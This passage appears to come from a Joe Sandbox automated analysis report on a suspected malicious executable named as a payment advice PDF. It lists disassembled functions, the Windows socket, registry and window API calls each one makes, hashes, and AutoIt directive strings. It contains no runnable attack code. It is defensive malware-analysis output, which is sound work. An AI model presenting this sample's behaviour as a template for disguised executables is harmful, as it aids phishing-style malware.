                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 003d63e8ba2d242b3014c5e16403aad5c9d5a04109608dfc4e1a0bb9948e45e5
                                                              • Instruction ID: f959f3818003f96eed644192aa1a387801d9ab033e077b4a40ef6c9a62803498
                                                              • Opcode Fuzzy Hash: 003d63e8ba2d242b3014c5e16403aad5c9d5a04109608dfc4e1a0bb9948e45e5
                                                              • Instruction Fuzzy Hash: 8231CC30648291AFEB208F28D884F5937B1FB5A714F1941B8FA01DB2B2DA71E850EB51
                                                              Function 0089DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DB2E
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DB54
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089DB57
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DB75
                                                              • SysFreeString.OLEAUT32(?), ref: 0089DB7E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0089DBA3
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 30f3715623db2d4fd81cd764b042b31ca5523382c14273c4f773562b55947e7f
                                                              • Instruction ID: 94525acbd9f5a9deb557eeea35bc5f1d647667cef997843911da8a96d51fdcd2
                                                              • Opcode Fuzzy Hash: 30f3715623db2d4fd81cd764b042b31ca5523382c14273c4f773562b55947e7f
                                                              • Instruction Fuzzy Hash: DD218176600219AFAF10EFA8DC88CBB73ADFB09374B058526FE15DB251D6749C418768
                                                              Function 008B6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008B61C6
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B61D5
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008B620E
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 008B6217
                                                              • WSAGetLastError.WSOCK32 ref: 008B6221
                                                              • closesocket.WSOCK32(00000000), ref: 008B624A
                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008B6263
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 910771015-0
                                                              • Opcode ID: 3cc2df1b1df6ddbe95ca4dd05fcdb4e1ee46187a63773f18372112048f48db8b
                                                              • Instruction ID: 363d42ad6b32fc051df8e609a548c2b4126e6c4070bfc4f4c49cd9c5093cfe1b
                                                              • Opcode Fuzzy Hash: 3cc2df1b1df6ddbe95ca4dd05fcdb4e1ee46187a63773f18372112048f48db8b
                                                              • Instruction Fuzzy Hash: 7F317231600118ABEF10AF68DC85FBE77B9FF45764F044029FA05D7292DB74AD148B62
                                                              Function 0089F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: bfc9eda6fb7c0f0585365b3501a999d0bd19cea115db75e65920e27921455042
                                                              • Instruction ID: 32b75e1fccbef147fe336dde5c351242a6e1277fb6f475c9b573f3be20128269
                                                              • Opcode Fuzzy Hash: bfc9eda6fb7c0f0585365b3501a999d0bd19cea115db75e65920e27921455042
                                                              • Instruction Fuzzy Hash: 11216A722042517ACA29B638AC02FA773D8FF65314F18443AF642C6153FB519D41C396
                                                              Function 0089DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DC09
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0089DC2F
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089DC32
                                                              • SysAllocString.OLEAUT32 ref: 0089DC53
                                                              • SysFreeString.OLEAUT32 ref: 0089DC5C
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0089DC76
                                                              • SysAllocString.OLEAUT32(?), ref: 0089DC84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 1a46c3d3893be59eddfef62d57c706ddaad07319c0c3509e9992f3fbe6c61ec4
                                                              • Instruction ID: 38bc6d29b82af20ed98d65ff6a8ba8b60f9a3ec29985645be275439af72c8791
                                                              • Opcode Fuzzy Hash: 1a46c3d3893be59eddfef62d57c706ddaad07319c0c3509e9992f3fbe6c61ec4
                                                              • Instruction Fuzzy Hash: B5217435604204AFAF14EFA8DC88DAB77EDFB08364B148125FA15CB261D674DC41CB68
                                                              Function 008C75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008C7632
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008C763F
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008C764A
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008C7659
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008C7665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 54e6bd236948305da2456facf8857c2b0d2b5de0f3f2f29f44910cab98497886
                                                              • Instruction ID: f5f5627218d672eac02b01f11e20ec0d77a9ff282e5f54f0855a6369148bfddd
                                                              • Opcode Fuzzy Hash: 54e6bd236948305da2456facf8857c2b0d2b5de0f3f2f29f44910cab98497886
                                                              • Instruction Fuzzy Hash: 7E118EB211021DBFEF118F64CC85EE77F6DFF08798F014115BA04A20A0CA729C21DBA4
                                                              Function 00869AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00869AE6
                                                                • Part of subcall function 00863187: EncodePointer.KERNEL32(00000000), ref: 0086318A
                                                                • Part of subcall function 00863187: __initp_misc_winsig.LIBCMT ref: 008631A5
                                                                • Part of subcall function 00863187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00869EA0
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00869EB4
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00869EC7
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00869EDA
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00869EED
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00869F00
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00869F13
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00869F26
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00869F39
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00869F4C
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00869F5F
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00869F72
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00869F85
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00869F98
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00869FAB
                                                                • Part of subcall function 00863187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00869FBE
                                                              • __mtinitlocks.LIBCMT ref: 00869AEB
                                                              • __mtterm.LIBCMT ref: 00869AF4
                                                                • Part of subcall function 00869B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00869AF9,00867CD0,008FA0B8,00000014), ref: 00869C56
                                                                • Part of subcall function 00869B5C: _free.LIBCMT ref: 00869C5D
                                                                • Part of subcall function 00869B5C: DeleteCriticalSection.KERNEL32(008FEC00,?,?,00869AF9,00867CD0,008FA0B8,00000014), ref: 00869C7F
                                                              • __calloc_crt.LIBCMT ref: 00869B19
                                                              • __initptd.LIBCMT ref: 00869B3B
                                                              • GetCurrentThreadId.KERNEL32 ref: 00869B42
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 5bd4ee6406addb827f43475c399fde7115f0c4b9bea08beab343342b482621b3
                                                              • Instruction ID: 9826d8151849d5053993a765b15196b073e945822d666a4341ac666522cf6067
                                                              • Opcode Fuzzy Hash: 5bd4ee6406addb827f43475c399fde7115f0c4b9bea08beab343342b482621b3
                                                              • Instruction Fuzzy Hash: C3F096326097215AEA357B7C7C03A5A36DDFF02731F23062AF5E4C61D2EF7084414562
                                                              Function 0086406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00863F85), ref: 00864085
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0086408C
                                                              • EncodePointer.KERNEL32(00000000), ref: 00864097
                                                              • DecodePointer.KERNEL32(00863F85), ref: 008640B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 9dbb75d8784b0738d8baa77dcd47f2ad025258f77776c3766862eca465969ed5
                                                              • Instruction ID: 2b37dd66c2974560e80d7ff3840e31aab1d1875e01a1bd2e73376f691a681aa6
                                                              • Opcode Fuzzy Hash: 9dbb75d8784b0738d8baa77dcd47f2ad025258f77776c3766862eca465969ed5
                                                              • Instruction Fuzzy Hash: 22E0B670599300EFEB90AF71EC0DF053ABAF718742F11812AF211E12A1CBB74604EB15
                                                              Function 008A64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 3253778849-0
                                                              • Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                              • Instruction ID: 219886b750e8e30c398323a6b51cecc07a6678762cef86dc3f0d10741b3a90e9
                                                              • Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                              • Instruction Fuzzy Hash: 7661AC3090065E9BDF11EF68CC82AFF37A5FF56308F094529F8599B192EB35A811CB52
                                                              Function 008C01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C02BD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C02FD
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008C0320
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008C0349
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008C038C
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C0399
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                              • String ID:
                                                              • API String ID: 4046560759-0
                                                              • Opcode ID: 5ec7479f20009f6fd4a7b998a03785c0edf0235ebc002fa4c904d70fc2f071d3
                                                              • Instruction ID: 4cef376e1081cbac2589dd6423b1a0969c0ddb89ad7c169c3871a175d61a0882
                                                              • Opcode Fuzzy Hash: 5ec7479f20009f6fd4a7b998a03785c0edf0235ebc002fa4c904d70fc2f071d3
                                                              • Instruction Fuzzy Hash: E8512531208244AFDB11EB68C885E6EBBB9FF84754F04491DF595C72A2DB31E905CF52
                                                              Function 008C5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 008C57FB
                                                              • GetMenuItemCount.USER32(00000000), ref: 008C5832
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008C585A
                                                              • GetMenuItemID.USER32(?,?), ref: 008C58C9
                                                              • GetSubMenu.USER32(?,?), ref: 008C58D7
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 008C5928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 66faaae46277a1da2194180c5a20f00f313496f182a3900def24a2e748a1cbc2
                                                              • Instruction ID: 2818e4401e70453039735873d3658b3183ea8ee0f72ad336155133f1ee7e0d55
                                                              • Opcode Fuzzy Hash: 66faaae46277a1da2194180c5a20f00f313496f182a3900def24a2e748a1cbc2
                                                              • Instruction Fuzzy Hash: 83515C31A00619AFDF11DF68C845EAEBBB5FF48320F104069E941EB351CB75AE818B91
                                                              Function 0089EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0089EF06
                                                              • VariantClear.OLEAUT32(00000013), ref: 0089EF78
                                                              • VariantClear.OLEAUT32(00000000), ref: 0089EFD3
                                                              • _memmove.LIBCMT ref: 0089EFFD
                                                              • VariantClear.OLEAUT32(?), ref: 0089F04A
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0089F078
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                              • String ID:
                                                              • API String ID: 1101466143-0
                                                              • Opcode ID: 725485b709dda26a087ef8751798eccb6d6398caea7ad8ad2d79956bd125fed3
                                                              • Instruction ID: b333cc90dee5e0661a255f4b25da0486f3344514fa2e87e437ea030209bea4f0
                                                              • Opcode Fuzzy Hash: 725485b709dda26a087ef8751798eccb6d6398caea7ad8ad2d79956bd125fed3
                                                              • Instruction Fuzzy Hash: D6516D75A00209DFDB14DF58C880AAAB7F9FF4C314B15856AEA59DB302E735E911CF90
                                                              Function 008A220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2258
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A22A3
                                                              • IsMenu.USER32(00000000), ref: 008A22C3
                                                              • CreatePopupMenu.USER32 ref: 008A22F7
                                                              • GetMenuItemCount.USER32(000000FF), ref: 008A2355
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008A2386
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: e80cd56292c5605b5551b9600cc21026e432e179376f31fad08e58d7a9b401e9
                                                              • Instruction ID: 06f3af5a93ff6590e152b79140c670a19b579a0c3cfda3b9cd9d6e7f705ea045
                                                              • Opcode Fuzzy Hash: e80cd56292c5605b5551b9600cc21026e432e179376f31fad08e58d7a9b401e9
                                                              • Instruction Fuzzy Hash: B9517630600209ABEF35CF6CD888BAEBBA5FF47318F104269E811E76A1D3759904CB51
                                                              Function 00841765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0084179A
                                                              • GetWindowRect.USER32(?,?), ref: 008417FE
                                                              • ScreenToClient.USER32(?,?), ref: 0084181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0084182C
                                                              • EndPaint.USER32(?,?), ref: 00841876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: 705ec3c036123187c058d1ca6cd1af67905b4d3187adc81e1c274554015b02cd
                                                              • Instruction ID: fb6e6be6be28e3e467aa29a99e211f6041181a2e5ae3b2790be74ce8c224bc15
